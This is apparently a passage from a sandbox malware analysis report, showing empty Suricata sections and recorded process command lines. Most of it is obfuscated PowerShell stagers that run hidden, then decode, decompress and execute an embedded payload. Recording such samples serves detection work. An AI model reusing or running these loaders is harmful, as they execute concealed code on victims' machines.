R4RB54Tem{1}EdMcY92T32hR5a176hyP7Wr+9cem6kKw+C+rG{0}ZE{0}nZxNwEjJox+5Cg0SBWOTNbdk0oR+YW7OyS5bX383mq1TbW8vLliLBeTDPdubBI{1}0rmva7AYOXg4AS9g'+'vIXkIPjl5CzYEauC8FEkOLc/YYwf3FHsjwBD8Argh3n8{1}nA9AE9E/InZITsqM+7{0}C51HF+J3MO5WwB//x/Zc5x7Re7r2KTmd+B89Pq04VHjeC3ATDEVIBcF4oyI/{0}3wgs4HJLlUXwhN{1}AI88Mnn89Xa3HSgufYrjP8Df9GSMG2CwAA')-f't','p')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
2348
-
-
-
-
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARgA2AEEAYgAyAFEAQwBBADcAVgBXACsAMgAvAGEAUwBCAEQAKwB2AFYATAAvAEIANgB7ADAAfQBDAHMAcQAwAFMAYgBCADUAOQBKAEYASwBsAFcAOQBzAHgAawBBAEMAQgA4AEkAYQBpADAAOABaAGUAegBJAGEAMQBsADkAaABMAHcATwAzADEAZgA3ADkAWgB3AEMARwA1AEoAcgAzAGMAUwAnACcAKwAnACcAYgBWAEUAcwBvACsAWgAyAGQAbAB2AHYAewAxAH0AbgBaACsAVAByAHkAQgBPAFcAUgB3AG8AZgAnACcAKwAnACcASwA5ADcAZAB2AGwATQBQAFgAeABqAEUAJwAnACsAJwAnAE8ARgBTADEASAArAG0AbABlAHkAYQBXAHsAMAB9AGoAYQA4AGYATgAzAFAAKwBsAG0AKwBWAEwANABvADIAUgBhAHUAVgB3ADAATgBNAG8AOQBuAFoAbQBiADIATwBZAHgASwBKAC8AYgB4AFEASgBRAEkAbABDAFEAbAB2AEcAQwBXAEoAewAxAH0AaQB7ADAAfQAvAEsAYwBNAEYAaQBjAG4ASgAxAGMAMAB7ADAAfQA4AFkAVAB5AFgAYwBuADkAVwBhAGcAeQBmAG8AUABaAFEAUwB5ADEAcwBiAGMAZwB5AGcAbQBLAGYATABuAFgANABCADYAVwBmAGgAVwA2AEsAMABhAEYAewAxAH0AbgA3ADkAcQB1AHIAVABrACsASwBzAGMASAA2ADMAeABpAHoAUgAxAEcANgBhAEMAQgBJAFcAZgBNAFoAVQBYAGYAbQBoAHkAdwBOADcANgBZAHsAMQB9AG8AYQB7ADEAfQBOADYATQBVAC8ANABYAEIAUwBHAE4AQwBxAFgAQwB2ADAAbwB3AFgAUABTAEEAbQB2ADMAewAxAH0ARQBuAEUAZwB2AHUASgBDAHsAMQB9AGMANQBYAGkAYwBtAFkAaAAxAEgAKwAxAHsAMAB9AEoATQAzAHMAaABUAFkAVgBoAE8AKwBZAGUAOAB2ADIAWQBKAEkAbQBhAFYANgBiAHkAZwBPAGwAcwA5AG8AYwAyAFAAWgB4ACsAdgBZADQARQBEAFUAbQBoAEgAZwBrAFMAOAAxAFcAWAB4AFAAZgBVAEkAMABtAGgAaABpAE8AZgBrAFcAcwB5AG4ANABGAFcAVgA4AFEAMABDAG0AYQA2AEQAbQBMADMAZgBFAG0AMABYAEwAUgBtAEwASwAvADgARgB6AE4AYQBpADIAdwB5ADcARgA2AHIAewAxAH0ARAAxAFcAQQBxAG0AMgBpAFAAVQA4AHgAUABTAFoAZQB6AGEANQB2ADIAWgBrAHIANgBrACcAJwArACcAJwArADQANgBqAGsAZwBRADUAZgB4AGcAWABBADcANABlAEUAYwBKADYAeABKADIAVABPAE4AWABtAEcAJwAnACsAJwAnAFEATQBlAEYANwBKAHYAdQBkAGcAagAnACcAKwAnACcANAByAEwAVgA1AFEAbgBmAGEAWAB4ACcAJwArACcAJwBRAHoAcgB6AFQAaABkAEMAJwAnACsAJwAnAHgANABuACcAJwArACcAJwBNAEkAMAAnACcAKwAnACcAMQA0AHYAWABSAEoAOAA5AEkASwA3AGsAewAwAH0AdQBZADQALwAxAHsAMQAnACcAKwAnACcAfQBqAHgAVQB3AFQAOQBOAEkARwBMAEUAdwBIAG4AUABxAHoAbwAvAHEAVAA4AE8AZgBTAHkASwAxAEsAbwBaAGYASgA3AEoAQQA1AGoAWQBpAFQAUgBqAGkAawBYAHMAWgBYADcAYgBtAFkAawBEAGsAagBPADAAUQBLAG0AVgBnAEwALwBOAFAAVQB3AHcAYgB4AEgAYwBKAEkAZwBJAFYARQBXAFYATABqAEoANwBYAHoAawBJAG8ASABYAFcAewAwAH0ATgBtAFUAOQBpADUARQBGAGMARQAvAEEASwBRAHEANAAvAGQAVwBZAGYATwBFADIAewAwAH0AUgAwADAAUwBBAG4AYgA3AE8AWABBADEATgA0AGMAcwBJAFoAbgAwAEkAVABQAFMANwBIAFEAJwAnACsAJwAnADUAQgB5AEgAVgBaAGoAaABKADgAawB7ADEAfQA3AEQAVwBuAHEANQBaAFUAdQB3AFkAegA0AGUAUQBWAEYAQwBUADEAcwBvAGIAWABnAHUANgBGADYAZABMAGUANQBaAG8ASgA2AE8AQgBHAFoAdQBaAG4AKwBEAHoAZwBQAHgAOQBvADgAUwBrAFMAOAA5AGkAQwBxAEEARQBHAHYAdQB5AEkAZQB4AFUAdwBpAGsAbABkAHEAMQBDAGQAVwAyAHEAVgBCAGQAcgB6ADYATABCADQAMgBaAGcAeQB5AEIAeQB6AGQAUQB6AHgAZwBSAGUATABRAEYAWgBJAHIATQBYAGcAcQBlAGEARQBYAHUAawBUAFUAdwB4AFUAagBJAFkAagBzAHEAbwBiAEwAYwBBAEEAMQA0AHsAMQB9AEEAaQBPADIANwBoAGcAUABqAHEAQwAzADUAbQBtAGIAQwBuAHYAUQBRAG0AUQArAFMAUgBsAHgARAB7ADAAfQBMAHUATQBpAHIAdwB4AG8ATABLAEEARwBTAFoARABUAHgAdgA5AHgANABlAGYAUwBzAC8AUABGAGoAcwBrAGgATgBGAHEAVwBYADEATQByAEYAWgBMAC8ATwBYAHcAWgBrAHEANABrADYAUQBHAGgASABSADYAeABBAEMAegBjAG0ASQBjAFcAVAAnACcAKwAnACcAcwBqAEgAeQByADcATwBhAE8AKwBNAEsAOQB7ADEAfQBHADgASQAzAHIARQBXAHYANgBGADAAewAwAH0AYQByAEcALwBnADEANABSAGYAMwAvAG4AawBYADEANwBjADEAZwB4AGEAcgB2AE8AbQBaAHkAZgB7ADAAfQBxAHYAcwBaADAAVQAyAHcAOABUADYAMwBrAE8AZABmACsATwBTADAAQwAzAEsAJwAnACsAJwAnAGQAUQBVAFgAWQBiAFYAVAByAFUATgBPAHEATABEAHoATAA3AE0ARwA0AFgAeABmAGoATwBxAHIAMQBxAEIAbQBNAEYAeAA0AHoAMgArAGYATAByACcAJwArACcAJwBWAEYASgBUAEwAcQB7ADEAfQBEAFoAdQBlAFkAMwAzAGIAbABCAEsAZwBhAHEAVgBTAEcANQBtAG8AWABLADUAYwBsAGMAMABsAG8ARABlAG0AeABXAEMASgAvAEYAWgBJAE4AOQBzAEcAagBLAEcAZwBYAGoAVwBzAGUAbQBLAFoAZABYAFoAKwBZAFYALwBmAEQARQB2AHUAWgBNAGgAcQBSAHMAVgBkAHoASQBjADgANgBYADQAYwBPADQAWgBoAG4AUAByAFkAYQBhAFkASQBXAGQAdwB2AE4AOQBOAFIAOABaAHIAMwBhAGwANQBvAFYAUwBKAHUAbgBOAHEAVgBKAFQAewAxAH0ASAB5AEkANwBPAEIANgA3AEYATAA4AGQAVwBqAE4AcgBHAEEAQQBjAHIAdgBoAG0ATgBPAHEAdwBhADIATQBqADYAVQBLAEYAawAwAHUAbQA3AFYAcQBmAGoAVwBxAGgAZgB2AGIAMQB6AFQAbwAzACcAJwArACcAJwBBAE8AQgAyAE8AOABNAEkAYQBEAGsAewAxAH0AMABzAGgAewAnACcAKwAnACcAMQB9AGQATAAyAEQAdQBiAG0AcQBkAFMAOABPAHMAMQBIADMAeQBqAFUAOAAyAEEARgB5AFYASQB4AHgAYwBnADAAeABnAGwANwB6AEYASABHAFMAYwA5ADgAaAA2ADMAKwBKAEoAQwBTADgAewAwAH0AagBpAHkAUQBjAFMAZAAzAHEATABvAFkAcgA5AHcAMgBnAC8AMQBlAHYAOABUAFIAZwBMAFYARwBHAEQAVQBtAHEAVwBzAFkAeABYAEcANwBnAG0AbwBtAEgAMQBZAEQAMQBBAEYAeABIAEYAZwBkAGoASgBKADcAJwAnACsAJwAnADUANQB7ADAAfQBqAEYAQQBjACsAOQA0AGMAZgBXAHUATwA1AE0AUgBpAHgAVAA0AFoAagBkADkAcQBMAGsAYgB5AHoAcwBRAHIAbAAzADAAMwBOAHUAZgBRAG0AeAAnACcAKwAnACcAWQAxADMAOQBlAGwAegBZADAAZwBIAEkAVQBkADkAdwB4AGkAOABBADEAWgBNACsAegBRAFMANQBkAEkAcwBGADUANwBMAHEAdgBuADIAVABTADYANgBLAFQALwBpAHgAVQB7ADAAfQBOAG8AWQBuAGoAWgBJAEUAWgA4AEEAVwBxAGYAWgBhADIATABvAC8AZABRAHcARgB2AGMAeQBvADEATgBBADIAZQBBAFUAcwBTAFIANABSAEIANQA0AFQAZQBtAHsAMQB9AEUAZABNAGMAWQA5ADIAVAAzADIAaABSADUAYQAxADcANgBoAHkAUAA3AFcAcgArADkAYwBlAG0ANgBrAEsAdwArAEMAKwByAEcAewAwAH0AWgBFAHsAMAB9AG4AWgB4AE4AdwBFAGoASgBvAHgAKwA1AEMAZwAwAFMAQgBXAE8AVABOAGIAZABrADAAbwBSACsAWQBXADcATwB5AFMANQBiAFgAMwA4ADMAbQBxADEAVABiAFcAOAB2AEwAbABpAEwAQgBlAFQARABQAGQAdQBiAEIASQB7ADEAfQAwAHIAbQB2AGEANwBBAFkATwBYAGcANABBAFMAOQBnACcAJwArACcAJwB2AEkAWABrAEkAUABqAGwANQBDAHoAWQBFAGEAdQBDADgARgBFAGsATwBMAGMALwBZAFkAdwBmADMARgBIAHMAagB3AEIARAA4AEEAcgBnAGgAMwBuADgAewAxAH0AbgBBADkAQQBFADkARQAvAEkAbgBaAEkAVABzAHEATQArADcAewAwAH0AQwA1ADEASABGACsASgAzAE0ATwA1AFcAdwBCAC8ALwB4AC8AWgBjADUAeAA3AFIAZQA3AHIAMgBLAFQAbQBkACsAQgA4ADkAUABxADAANABWAEgAagBlAEMAMwBBAFQARABFAFYASQBCAGMARgA0AG8AeQBJAC8AewAwAH0AMwB3AGcAcwA0AEgASgBMAGwAVQBYAHcAaABOAHsAMQB9AEEASQA4ADgATQBuAG4AOAA5AFgAYQAzAEgAUwBnAHUAZgBZAHIAagBQADgARABmADkARwBTAE0ARwAyAEMAdwBBAEEAJwAnACkALQBmACcAJwB0ACcAJwAsACcAJwBwACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA |
cmdline | "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAF6Ab2QCA7VW+2/aSBD+vVL/B6{0}Csq0SbB59JFKlW9sxkACB8Iai08ZezIa1l9hLwO31f79ZwCG5Jr3cS'+'bVEso+Z2dlvv{1}nZ+TryBOWRwof'+'K97dvlMPXxjE'+'OFS1H+mleyaW{0}ja8fN3P+lm+VL4o2RauVw0NMo9nZmb2OYxKJ/bxQJQIlCQlvGCWJ{1}i{0}/KcMFicnJ1c0{0}8YTyXcn9WagyfoPZQSy1sbcgygmKfLnX4B6WfhW6K0aF{1}n79qurTk+KscH63xizR1G6aCBIWfMZUXfmhywN76Y{1}oa{1}N6MU/4XBSGNCqXCv0owXPSAmv3{1}EnEgvuJC{1}c5XicmYh1H+1{0}JM3shTYVhO+Ye8v2YJImaV6bygOls9oc2PZx+vY4EDUmhHgkS81WXxPfUI0mhhiOfkWsyn4FWV8Q0Cma6DmL3fEm0XLRmLK/8FzNai2wy7F6r{1}D1WAqm2iPU8xPSZeza5v2Zkr6k'+'+46jkgQ5fxgXA74eEcJ6xJ2TONXmG'+'QMeF7Jvudgj'+'4rLV5QnfaXx'+'QzrzThdC'+'x4n'+'MI0'+'14vXRJ89IK7k{0}uY4/1{1'+'}jxUwT9NIGLEwHnPqzo/qT8OfSyK1KoZfJ7JA5jYiTRjikXsZX7bmYkDkjO0QKmVgL/NPUwwbxHcJIgIVEWVLjJ7XzkIoHXW{0}NmU9i5EFcE/AKQq4/dWYfOE2{0}R00SAnb7OXA1N4csIZn0ITPS7HQ'+'5ByHVZjhJ8k{1}7DWnq5ZUuwYz4eQVFCT1sobXgu6F6dLe5ZoJ6OBGZuZn+DzgPx9o8SkS89iCqAEGvuyIexUwikldq1CdW2qVBdrz6LB42ZgyyByzdQzxgReLQFZIrMXgqeaEXukTUwxUjIYjsqobLcAA14{1}AiO27hgPjqC35mmbCnvQQmQ+SRlxD{0}LuMirwxoLKAGSZDTxv9x4efSs/PFjskhNFqWX1MrFZL/OXwZkq4k6QGhHR6xACzcmIcWT'+'sjHyr7OaO+MK9{1}G8I3rEWv6F0{0}arG/g14Rf3/nkX17c1gxarvOmZyf{0}qvsZ0U2w8T63kOdf+OS0C3K'+'dQUXYbVTrUNOqLDzL7MG4XxfjOqr1qBmMFx4z2+fLr'+'VFJTLq{1}DZueY33blBKgaqVSG5moXK5clc0loDemxWCJ/FZIN9sGjKGgXjWsemKZdXZ+YV/fDEvuZMhqRsVdzIc86X4cO4ZhnPrYaaYIWdwvN9NR8Zr3al5oVSJunNqVJT{1}HyI7OB67FL8dWjNrGAAcrvhmNOqwa2Mj6UKFk0um7VqfjWqhfvb1zTo3'+'AOB2O8MIaDk{1}0sh{'+'1}dL2DubmqdS8Os1H3yjU82AFyVIxxcg0xgl7zFHGSc98h63+JJCS8{0}jiyQcSd3qLoYr9w2g/1ev8TRgLVGGDUmqWsYxXG7gmomH1YD1AFxHFgdjJJ7'+'55{0}jFAc+94cfWuO5MRixT4Zjd9qLkbyzsQrl303NufQmx'+'Y139elzY0gHIUd9wxi8A1ZM+zQS5dIsF57Lqvn2TS66KT/ixU{0}NoYnjZIEZ8AWqfZa2Lo/dQwFvcyo1NA2eAUsSR4RB54Tem{1}EdMcY92T32hR5a176hyP7Wr+9cem6kKw+C+rG{0}ZE{0}nZxNwEjJox+5Cg0SBWOTNbdk0oR+YW7OyS5bX383mq1TbW8vLliLBeTDPdubBI{1}0rmva7AYOXg4AS9g'+'vIXkIPjl5CzYEauC8FEkOLc/YYwf3FHsjwBD8Argh3n8{1}nA9AE9E/InZITsqM+7{0}C51HF+J3MO5WwB//x/Zc5x7Re7r2KTmd+B89Pq04VHjeC3ATDEVIBcF4oyI/{0}3wgs4HJLlUXwhN{1}AI88Mnn89Xa3HSgufYrjP8Df9GSMG2CwAA')-f't','p')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) |
cmdline | powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARgA2AEEAYgAyAFEAQwBBADcAVgBXACsAMgAvAGEAUwBCAEQAKwB2AFYATAAvAEIANgB7ADAAfQBDAHMAcQAwAFMAYgBCADUAOQBKAEYASwBsAFcAOQBzAHgAawBBAEMAQgA4AEkAYQBpADAAOABaAGUAegBJAGEAMQBsADkAaABMAHcATwAzADEAZgA3ADkAWgB3AEMARwA1AEoAcgAzAGMAUwAnACcAKwAnACcAYgBWAEUAcwBvACsAWgAyAGQAbAB2AHYAewAxAH0AbgBaACsAVAByAHkAQgBPAFcAUgB3AG8AZgAnACcAKwAnACcASwA5ADcAZAB2AGwATQBQAFgAeABqAEUAJwAnACsAJwAnAE8ARgBTADEASAArAG0AbABlAHkAYQBXAHsAMAB9AGoAYQA4AGYATgAzAFAAKwBsAG0AKwBWAEwANABvADIAUgBhAHUAVgB3ADAATgBNAG8AOQBuAFoAbQBiADIATwBZAHgASwBKAC8AYgB4AFEASgBRAEkAbABDAFEAbAB2AEcAQwBXAEoAewAxAH0AaQB7ADAAfQAvAEsAYwBNAEYAaQBjAG4ASgAxAGMAMAB7ADAAfQA4AFkAVAB5AFgAYwBuADkAVwBhAGcAeQBmAG8AUABaAFEAUwB5ADEAcwBiAGMAZwB5AGcAbQBLAGYATABuAFgANABCADYAVwBmAGgAVwA2AEsAMABhAEYAewAxAH0AbgA3ADkAcQB1AHIAVABrACsASwBzAGMASAA2ADMAeABpAHoAUgAxAEcANgBhAEMAQgBJAFcAZgBNAFoAVQBYAGYAbQBoAHkAdwBOADcANgBZAHsAMQB9AG8AYQB7ADEAfQBOADYATQBVAC8ANABYAEIAUwBHAE4AQwBxAFgAQwB2ADAAbwB3AFgAUABTAEEAbQB2ADMAewAxAH0ARQBuAEUAZwB2AHUASgBDAHsAMQB9AGMANQBYAGkAYwBtAFkAaAAxAEgAKwAxAHsAMAB9AEoATQAzAHMAaABUAFkAVgBoAE8AKwBZAGUAOAB2ADIAWQBKAEkAbQBhAFYANgBiAHkAZwBPAGwAcwA5AG8AYwAyAFAAWgB4ACsAdgBZADQARQBEAFUAbQBoAEgAZwBrAFMAOAAxAFcAWAB4AFAAZgBVAEkAMABtAGgAaABpAE8AZgBrAFcAcwB5AG4ANABGAFcAVgA4AFEAMABDAG0AYQA2AEQAbQBMADMAZgBFAG0AMABYAEwAUgBtAEwASwAvADgARgB6AE4AYQBpADIAdwB5ADcARgA2AHIAewAxAH0ARAAxAFcAQQBxAG0AMgBpAFAAVQA4AHgAUABTAFoAZQB6AGEANQB2ADIAWgBrAHIANgBrACcAJwArACcAJwArADQANgBqAGsAZwBRADUAZgB4AGcAWABBADcANABlAEUAYwBKADYAeABKADIAVABPAE4AWABtAEcAJwAnACsAJwAnAFEATQBlAEYANwBKAHYAdQBkAGcAagAnACcAKwAnACcANAByAEwAVgA1AFEAbgBmAGEAWAB4ACcAJwArACcAJwBRAHoAcgB6AFQAaABkAEMAJwAnACsAJwAnAHgANABuACcAJwArACcAJwBNAEkAMAAnACcAKwAnACcAMQA0AHYAWABSAEoAOAA5AEkASwA3AGsAewAwAH0AdQBZADQALwAxAHsAMQAnACcAKwAnACcAfQBqAHgAVQB3AFQAOQBOAEkARwBMAEUAdwBIAG4AUABxAHoAbwAvAHEAVAA4AE8AZgBTAHkASwAxAEsAbwBaAGYASgA3AEoAQQA1AGoAWQBpAFQAUgBqAGkAawBYAHMAWgBYADcAYgBtAFkAawBEAGsAagBPADAAUQBLAG0AVgBnAEwALwBOAFAAVQB3AHcAYgB4AEgAYwBKAEkAZwBJAFYARQBXAFYATABqAEoANwBYAHoAawBJAG8ASABYAFcAewAwAH0ATgBtAFUAOQBpADUARQBGAGMARQAvAEEASwBRAHEANAAvAGQAVwBZAGYATwBFADIAewAwAH0AUgAwADAAUwBBAG4AYgA3AE8AWABBADEATgA0AGMAcwBJAFoAbgAwAEkAVABQAFMANwBIAFEAJwAnACsAJwAnADUAQgB5AEgAVgBaAGoAaABKADgAawB7ADEAfQA3AEQAVwBuAHEANQBaAFUAdQB3AFkAegA0AGUAUQBWAEYAQwBUADEAcwBvAGIAWABnAHUANgBGADYAZABMAGUANQBaAG8ASgA2AE8AQgBHAFoAdQBaAG4AKwBEAHoAZwBQAHgAOQBvADgAUwBrAFMAOAA5AGkAQwBxAEEARQBHAHYAdQB5AEkAZQB4AFUAdwBpAGsAbABkAHEAMQBDAGQAVwAyAHEAVgBCAGQAcgB6ADYATABCADQAMgBaAGcAeQB5AEIAeQB6AGQAUQB6AHgAZwBSAGUATABRAEYAWgBJAHIATQBYAGcAcQBlAGEARQBYAHUAawBUAFUAdwB4AFUAagBJAFkAagBzAHEAbwBiAEwAYwBBAEEAMQA0AHsAMQB9AEEAaQBPADIANwBoAGcAUABqAHEAQwAzADUAbQBtAGIAQwBuAHYAUQBRAG0AUQArAFMAUgBsAHgARAB7ADAAfQBMAHUATQBpAHIAdwB4AG8ATABLAEEARwBTAFoARABUAHgAdgA5AHgANABlAGYAUwBzAC8AUABGAGoAcwBrAGgATgBGAHEAVwBYADEATQByAEYAWgBMAC8ATwBYAHcAWgBrAHEANABrADYAUQBHAGgASABSADYAeABBAEMAegBjAG0ASQBjAFcAVAAnACcAKwAnACcAcwBqAEgAeQByADcATwBhAE8AKwBNAEsAOQB7ADEAfQBHADgASQAzAHIARQBXAHYANgBGADAAewAwAH0AYQByAEcALwBnADEANABSAGYAMwAvAG4AawBYADEANwBjADEAZwB4AGEAcgB2AE8AbQBaAHkAZgB7ADAAfQBxAHYAcwBaADAAVQAyAHcAOABUADYAMwBrAE8AZABmACsATwBTADAAQwAzAEsAJwAnACsAJwAnAGQAUQBVAFgAWQBiAFYAVAByAFUATgBPAHEATABEAHoATAA3AE0ARwA0AFgAeABmAGoATwBxAHIAMQBxAEIAbQBNAEYAeAA0AHoAMgArAGYATAByACcAJwArACcAJwBWAEYASgBUAEwAcQB7ADEAfQBEAFoAdQBlAFkAMwAzAGIAbABCAEsAZwBhAHEAVgBTAEcANQBtAG8AWABLADUAYwBsAGMAMABsAG8ARABlAG0AeABXAEMASgAvAEYAWgBJAE4AOQBzAEcAagBLAEcAZwBYAGoAVwBzAGUAbQBLAFoAZABYAFoAKwBZAFYALwBmAEQARQB2AHUAWgBNAGgAcQBSAHMAVgBkAHoASQBjADgANgBYADQAYwBPADQAWgBoAG4AUAByAFkAYQBhAFkASQBXAGQAdwB2AE4AOQBOAFIAOABaAHIAMwBhAGwANQBvAFYAUwBKAHUAbgBOAHEAVgBKAFQAewAxAH0ASAB5AEkANwBPAEIANgA3AEYATAA4AGQAVwBqAE4AcgBHAEEAQQBjAHIAdgBoAG0ATgBPAHEAdwBhADIATQBqADYAVQBLAEYAawAwAHUAbQA3AFYAcQBmAGoAVwBxAGgAZgB2AGIAMQB6AFQAbwAzACcAJwArACcAJwBBAE8AQgAyAE8AOABNAEkAYQBEAGsAewAxAH0AMABzAGgAewAnACcAKwAnACcAMQB9AGQATAAyAEQAdQBiAG0AcQBkAFMAOABPAHMAMQBIADMAeQBqAFUAOAAyAEEARgB5AFYASQB4AHgAYwBnADAAeABnAGwANwB6AEYASABHAFMAYwA5ADgAaAA2ADMAKwBKAEoAQwBTADgAewAwAH0AagBpAHkAUQBjAFMAZAAzAHEATABvAFkAcgA5AHcAMgBnAC8AMQBlAHYAOABUAFIAZwBMAFYARwBHAEQAVQBtAHEAVwBzAFkAeABYAEcANwBnAG0AbwBtAEgAMQBZAEQAMQBBAEYAeABIAEYAZwBkAGoASgBKADcAJwAnACsAJwAnADUANQB7ADAAfQBqAEYAQQBjACsAOQA0AGMAZgBXAHUATwA1AE0AUgBpAHgAVAA0AFoAagBkADkAcQBMAGsAYgB5AHoAcwBRAHIAbAAzADAAMwBOAHUAZgBRAG0AeAAnACcAKwAnACcAWQAxADMAOQBlAGwAegBZADAAZwBIAEkAVQBkADkAdwB4AGkAOABBADEAWgBNACsAegBRAFMANQBkAEkAcwBGADUANwBMAHEAdgBuADIAVABTADYANgBLAFQALwBpAHgAVQB7ADAAfQBOAG8AWQBuAGoAWgBJAEUAWgA4AEEAVwBxAGYAWgBhADIATABvAC8AZABRAHcARgB2AGMAeQBvADEATgBBADIAZQBBAFUAcwBTAFIANABSAEIANQA0AFQAZQBtAHsAMQB9AEUAZABNAGMAWQA5ADIAVAAzADIAaABSADUAYQAxADcANgBoAHkAUAA3AFcAcgArADkAYwBlAG0ANgBrAEsAdwArAEMAKwByAEcAewAwAH0AWgBFAHsAMAB9AG4AWgB4AE4AdwBFAGoASgBvAHgAKwA1AEMAZwAwAFMAQgBXAE8AVABOAGIAZABrADAAbwBSACsAWQBXADcATwB5AFMANQBiAFgAMwA4ADMAbQBxADEAVABiAFcAOAB2AEwAbABpAEwAQgBlAFQARABQAGQAdQBiAEIASQB7ADEAfQAwAHIAbQB2AGEANwBBAFkATwBYAGcANABBAFMAOQBnACcAJwArACcAJwB2AEkAWABrAEkAUABqAGwANQBDAHoAWQBFAGEAdQBDADgARgBFAGsATwBMAGMALwBZAFkAdwBmADMARgBIAHMAagB3AEIARAA4AEEAcgBnAGgAMwBuADgAewAxAH0AbgBBADkAQQBFADkARQAvAEkAbgBaAEkAVABzAHEATQArADcAewAwAH0AQwA1ADEASABGACsASgAzAE0ATwA1AFcAdwBCAC8ALwB4AC8AWgBjADUAeAA3AFIAZQA3AHIAMgBLAFQAbQBkACsAQgA4ADkAUABxADAANABWAEgAagBlAEMAMwBBAFQARABFAFYASQBCAGMARgA0AG8AeQBJAC8AewAwAH0AMwB3AGcAcwA0AEgASgBMAGwAVQBYAHcAaABOAHsAMQB9AEEASQA4ADgATQBuAG4AOAA5AFgA